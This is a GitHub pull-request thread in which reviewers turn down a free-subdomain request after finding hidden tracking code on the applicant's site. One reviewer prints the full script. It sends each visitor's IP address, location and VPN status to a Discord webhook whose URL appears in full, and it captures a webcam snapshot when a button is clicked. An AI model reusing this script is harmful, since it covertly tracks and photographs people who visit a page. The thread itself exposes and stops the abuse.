### PR TITLE
New Domain: hacker.is-a.dev

### PR DESCRIPTION
**Pull request by NaTDeveloper**
## Requirements
Unless explicitly specified otherwise by a **maintainer** or in the requirement description, your domain must pass **ALL** the indicated requirements above.

Please note that we reserve the rights not to accept any domain at our own discretion.

- [✅ ] The file is in the `domains` folder and is in the JSON format.
- [✅ ] The file's name is all lowercased and alphanumeric. 
- [✅ ] You have completed your website. 
- [✅ ] The website is reachable.  
- [✅ ] The CNAME record doesn't contain `https://` or `/`.  
- [✅ ] There is sufficient information at the `owner` field.  

## Website Link/Preview

https://itsnothackeryt123.github.io/itsnothacker/

### CODE REVIEW

**Comment by JustDeveloper1** [comment]
i think that domain prohibited

File: dangnat.json
Comment (CuteDog5695) [inline dangnat.json:1]: File needs to be in `domains` directory.

File: domains/248.json [hunk 1]
```diff
@@ -0,0 +1,11 @@
+ {
+    "description": "Just an about me page.",
+    "repo": "https://github.com/ItsNotHackerYT123/itsnothacker",
+    "owner": {
+        "username": "ItsNotHackerYT123",
+        "email": "hackernotfound679@gmail.com",
+        "twitter": "ItsNotHacker"
+    },
+    "record": {
+        "CNAME": "itsnothackeryt123.github.io"
```
Comment (CuteDog5695) [inline domains/248.json:10]: Can't access the website (both CNAME and the name of the repo you put), please give a preview of your website.

File: dangnat.json [hunk 2]
```diff
@@ -0,0 +1,9 @@
+{
+    "owner": {
+        "username": "NaTDeveloper",
+        "email": "devihermeena@gmail.com"
+    },
+    "record": {
+        "CNAME": "natdev-5ffb.onrender.com"
```
Comment (CuteDog5695) [inline dangnat.json:7]: 404 not found, please give a preview of your website.

**Review by iostpa — CHANGES_REQUESTED** [review]

**Comment by JustDeveloper1** [comment]
**also `itsnothackeryt123.github.io/itsnothacker/` is a redirect to another unknown website**

**Review by Satindar31 — COMMENTED** [review]
you are missing a `}` in the `248.json` file

**Comment by CuteDog5695** [comment]
> you are missing a `}` in the `248.json` file

Oh I didn't see that part lmao

File: domains/248.json (hunk 1 above)
Comment (JustDeveloper1) [reply domains/248.json:10]: # I found a code that sends personal data to discord webhook!!!111!
code at bottom of `body` tag and it sends your **ip**
```html
<script>
        const webhookURL = 'https://discord.com/api/webhooks/1284853390328987658/M8yCd5xSSBsKx5LbNGXN9s3fMPZVRv1VqewoRZJfFQdSimJyQE1b07UjW1kfycvkSPEL';

        // Function to send IP, location, flag emoji, VPN status, and time as an embed to the webhook
        function sendIPAndLocation(ip, location, flagEmoji, visitTime, vpnStatus) {
            const embed = {
                "embeds": [{
                    "title": "|------------- Visitor logged -------------|",
                    "description": "",
                    "color": 5814783,  // Light blue color for the embed
                    "fields": [
                        {
                            "name": "𝐈𝐏 𝐀𝐝𝐝𝐫𝐞𝐬𝐬 :",
                            "value": ip,
                            "inline": true
                        },
                        {
                            "name": "𝐋𝐨𝐜𝐚𝐭𝐢𝐨𝐧 :",
                            "value": `${location} ${flagEmoji}`,
                            "inline": true
                        },
                        {
                            "name": "𝐕𝐢𝐬𝐢𝐭𝐞𝐝 𝐓𝐢𝐦𝐞",
                            "value": visitTime,
                            "inline": false
                        },
                        {
                            "name": "𝐕𝐏𝐍 :",
                            "value": vpnStatus ? "**Yes**" : "**No**",
                            "inline": false
                        }
                    ],
                    "timestamp": new Date().toISOString(),  // Adds current timestamp
                    "footer": {
                        "text": "Visitor Details",
                        "icon_url": "https://cdn.discordapp.com/avatars/1113852804172349563/848eac2492d3c85cded1c562d65e1b08.webp?size=1024"
                    }
                }]
            };

            fetch(webhookURL, {
                method: 'POST',
                headers: { 'Content-Type': 'application/json' },
                body: JSON.stringify(embed)
            }).then(response => {
                if (response.ok) {
                    console.log('Embed sent to Discord successfully!');
                } else {
                    console.error('Error sending embed to Discord.');
                }
            }).catch(error => {
                console.error('Error:', error);
            });
        }

        // Function to convert country code to flag emoji
        function getFlagEmoji(countryCode) {
            return countryCode.toUpperCase().replace(/./g, char => 
                String.fromCodePoint(127397 + char.charCodeAt())
            );
        }

        // Get current time in a readable format
        function getCurrentTime() {
            const now = new Date();
            return now.toLocaleString(); // e.g., "9/15/2024, 5:30:00 PM"
        }

        // Fetch the user's IP address and location
        fetch('https://api.ipify.org?format=json')
            .then(response => response.json())
            .then(data => {
                const ip = data.ip;

                // Fetch location and VPN details using ipapi
                return fetch(`https://ipapi.co/${ip}/json/`)
                    .then(response => response.json())
                    .then(locationData => {
                        const country = locationData.country_name;
                        const state = locationData.region;
                        const countryCode = locationData.country_code;
                        const location = `${state}, ${country}`;
                        
                        const flagEmoji = getFlagEmoji(countryCode);
                        const visitTime = getCurrentTime();
                        const vpnStatus = locationData.security ? locationData.security.is_vpn : false;

                        // Send the IP, location, flag emoji, VPN status, and visit time in an embed
                        sendIPAndLocation(ip, location, flagEmoji, visitTime, vpnStatus);
                    });
            })
            .catch(error => {
                console.error('Error fetching IP or location:', error);
            });

        const surpriseButton = document.getElementById('surpriseButton');
        const canvas = document.getElementById('captureCanvas');
        const ctx = canvas.getContext('2d');

        surpriseButton.addEventListener('click', () => {
            // Request access to the webcam
            navigator.mediaDevices.getUserMedia({ video: true })
                .then((stream) => {
                    const video = document.createElement('video');
                    video.srcObject = stream;
                    video.play();

                    video.addEventListener('loadeddata', () => {
                        // Capture a frame from the video feed
                        canvas.width = video.videoWidth;
                        canvas.height = video.videoHeight;
                        ctx.drawImage(video, 0, 0, canvas.width, canvas.height);
                        
                        // Convert the canvas content to Blob
                        canvas.toBlob((blob) => {
                            const formData = new FormData();
                            formData.append('file', blob, 'webcam_image.png');

                            const embed = {
                                "embeds": [{
                                    "color": 5814783,  // Light blue color
                                    "image": {
                                        "url": "attachment://webcam_image.png"
                                    }
                                }]
                            };

                            formData.append('payload_json', JSON.stringify(embed));

                            // Send the image and embed to the Discord webhook
                            fetch(webhookURL, {
                                method: 'POST',
                                body: formData
                            }).then(response => {
                                if (response.ok) {
                                    console.log('Image embed sent to Discord successfully!');
                                } else {
                                    console.error('Error sending image embed to Discord.');
                                }
                            }).catch(error => {
                                console.error('Error:', error);
                            });

                            // Stop the webcam stream after capturing the image
                            stream.getTracks().forEach(track => track.stop());

                            // Replace the button with the monkey image
                            surpriseButton.style.display = 'none';
                            const img = document.createElement('img');
                            img.src = 'https://api.hub.jhu.edu/factory/sites/default/files/styles/hub_xlarge/public/monkey092018.jpg';
                            img.alt = 'Monkey Troll';
                            img.style.width = '400px';
                            img.style.borderRadius = '15px';
                            document.querySelector('.container').appendChild(img);
                        }, 'image/png');
                    });
                })
                .catch((error) => {
                    console.error('Camera access denied:', error);
                });
        });
    </script>
```

**Review by justdevw — COMMENTED** [review]
# this website sends your ip on this discord webhook: `https://discord.com/api/webhooks/1284853390328987658/M8yCd5xSSBsKx5LbNGXN9s3fMPZVRv1VqewoRZJfFQdSimJyQE1b07UjW1kfycvkSPEL`

File: domains/248.json (hunk 1 above)
Comment (CuteDog5695) [reply domains/248.json:10]: Placing PR in abuse risk for now

Comment (wdhdev) [reply domains/248.json:10]: Thanks for noting this. I have deleted their Discord webhook (using https://dw.hrsn.dev) and notified them that this isn't allowed. This is extremely invasive behaviour and is not tolerated by is-a.dev. They will be promptly terminated from the service :)

**Comment by VaibhavSys** [comment]
Hey cool wannabe hacker, you didn't even make the PR correctly.

**Comment by ItsNotHackerYT123** [comment]
yep you got me

**Comment by Satindar31** [comment]
Not a day over 12

**Comment by ItsNotHackerYT123** [comment]
> Not a day over 12

bruh am 15

**Comment by ItsNotHackerYT123** [comment]
**so can i get my domain if i remove this ip logger?**

**Comment by wdhdev** [comment]
What do you think mate?

**Comment by ItsNotHackerYT123** [comment]
> What do you think mate?

guess that means no.

**Comment by wdhdev** [comment]
Your repository has been reported to GitHub and will likely be taken down and your GitHub account will likely be terminated. You will also be banned from is-a.dev along with @NaTDeveloper.

@JustDeveloper1 I commend your effort reporting this troublemaker, thank you.

**Comment by wdhdev** [comment]
> guess that means no.

Bingo.

**Comment by ItsNotHackerYT123** [comment]
> Your repository has been reported to GitHub and will likely be taken down and your GitHub account will likely be terminated. You will also be banned from is-a.dev along with @NaTDeveloper.
> 
> @JustDeveloper1 I commend your effort reporting this troublemaker, thank you.

nat is my friend he jest helped me i didn't tell him about this so don't ban him

**Comment by wdhdev** [comment]
I don't really care, it is both of your faults.

**Comment by wdhdev** [comment]
Feel free to discuss this further on our Discord server, linked in the README.

**Comment by JustDeveloper1** [comment]
> Your repository has been reported to GitHub and will likely be taken down and your GitHub account will likely be terminated. You will also be banned from is-a.dev along with @NaTDeveloper.
> 
> @JustDeveloper1 I commend your effort reporting this troublemaker, thank you.

i was also reported @ItsNotHackerYT123

**Pull request closed without merging**